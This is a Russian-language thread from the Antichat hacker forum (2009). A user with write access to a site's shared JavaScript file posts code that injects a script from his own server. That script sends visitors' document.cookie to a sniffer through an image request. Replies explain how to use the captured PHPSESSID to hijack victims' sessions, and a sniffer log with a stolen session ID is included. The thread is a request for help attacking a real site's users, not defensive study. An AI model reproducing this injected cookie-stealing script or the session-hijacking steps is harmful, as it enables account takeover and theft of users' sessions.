ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

JS help
  #1  
Старый 29.07.2009, 19:14
comeoff
Познающий
Регистрация: 10.03.2008
Сообщений: 81
Провел на форуме:
233979

Репутация: 1
Question JS help

Вообщем есть сайтик, на всех его страницах есть js скрипт
<script src="/js/style.js" type="text/javascript" charset="utf-8"></script>
в этот файл имею возможность записать что угодно. делаю следующее: записываю в начало
Цитата:
<!--
document.writeln("<script src='site/js/c.js' type='text/javascript'></script>");
//-->
этот файл c.js загружается с моего сервера. его содержимое:

Цитата:
img = new Image(); img.src = "site/snf/1x1.gif"+document.cookie;
после чего смотрю лог сниффера и кроме хоста и сессии ничего нету.

Вопрос Как стянуть куки, и что вообще интересного можно сделать с сайтом?

PS на сайте DLE стоит
 
Ответить с цитированием

  #2  
Старый 29.07.2009, 19:29
inlanger
Познавший АНТИЧАТ
Регистрация: 07.01.2007
Сообщений: 1,263
Провел на форуме:
3326855

Репутация: 702


По умолчанию

А ты уверен что должно что-то ещё приходить? В смысле - залогиненные юзеры твой жабаскрипт загружают?
 
Ответить с цитированием

  #3  
Старый 29.07.2009, 19:36
comeoff
Познающий
Регистрация: 10.03.2008
Сообщений: 81
Провел на форуме:
233979

Репутация: 1
По умолчанию

да залогиненные. на себе проверял.
 
Ответить с цитированием

  #4  
Старый 29.07.2009, 19:46
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
кроме хоста и сессии ничего нету
ваще, а это что, сессия уже не куки что ли??? В современно мире пароли в куках только дауны хранят, достаточно идентификации по сессии
 
Ответить с цитированием

  #5  
Старый 29.07.2009, 21:04
comeoff
Познающий
Регистрация: 10.03.2008
Сообщений: 81
Провел на форуме:
233979

Репутация: 1
По умолчанию

ну что толку от PHPSESSID
как хэш украсть?
 
Ответить с цитированием

  #6  
Старый 29.07.2009, 21:09
altblitz
Постоянный
Регистрация: 05.06.2009
Сообщений: 706
Провел на форуме:
2764047

Репутация: 759


Отправить сообщение для altblitz с помощью ICQ
По умолчанию

Цитата:
Сообщение от comeoff  
Вообщем есть сайтик, на всех его страницах есть js скрипт
<script src="/js/style.js" type="text/javascript" charset="utf-8"></script>
в этот файл имею возможность записать что угодно.
ничего не сделать. анти-кроссайт-скриптинг заложен изначально в броузеры.
маялся дня три подобной херней в первые и-нет годы.

на домашнем компе - получится. в реалиях сети - увы.
 
Ответить с цитированием

  #7  
Старый 29.07.2009, 22:18
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от comeoff  
ну что толку от PHPSESSID
как хэш украсть?
Ты мою первую мессагу в этой теме читал вообще???? У тебя у самого есть куки от этого сайта? У тебя там что, есть что-то кроме как PHPSESSID???
 
Ответить с цитированием

  #8  
Старый 29.07.2009, 22:27
comeoff
Познающий
Регистрация: 10.03.2008
Сообщений: 81
Провел на форуме:
233979

Репутация: 1
По умолчанию

Цитата:
Дата: [2009-07-29 18:36:46] ||
IP:93.81.141.141
Real IP:
Браузер: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12
Хост: http://сайт.ру
Печеньки: PHPSESSID=hr1jr08mh7633f4on4e4ddb0t6
вот это всё
 
Ответить с цитированием

  #9  
Старый 29.07.2009, 22:32
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

и? Ты стырил куки, чувак, ты хоцкер! Не шутка. Вставляй стыренную сессию вместо своей (например в опере) - и ты станешь тем, у кого стырил сессию (если она еще не просрочена, у них есть время жизни). Т.е. такие дела надо проворачивать моментально или писать для этого соответствующий скрипт.

ЗЫЖ Кроме шуток, тему можешь закрывать, если у тебя там в куках только сессия, чего ты еще ждешь от жертвы? У неё что, какой-то уникальный компутер или у неё какие-то уникальные отношения с сервом? Нет, такие же, как и у тебя и у любого другого.

На пальтсах - сервер берет сессию, делает скуль-запрос по сессии в базу, происходит идентификация пользователя
 
Ответить с цитированием

  #10  
Старый 29.07.2009, 23:04
comeoff
Познающий
Регистрация: 10.03.2008
Сообщений: 81
Провел на форуме:
233979

Репутация: 1
По умолчанию

Цитата:
На пальтсах - сервер берет сессию, делает скуль-запрос по сессии в базу, происходит идентификация пользователя
Этого было бы достаточно для разъяснения а ты поясничать начинаешь, кул хацкер, не все же такие умные как ты, поэтому тут открыта регистрация для всех и все общаются друг с другом и задают какие то глупые и не глупые вопросы.
Цитата:
тему можешь закрывать
не в моей компетенции, так бы закрыл
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ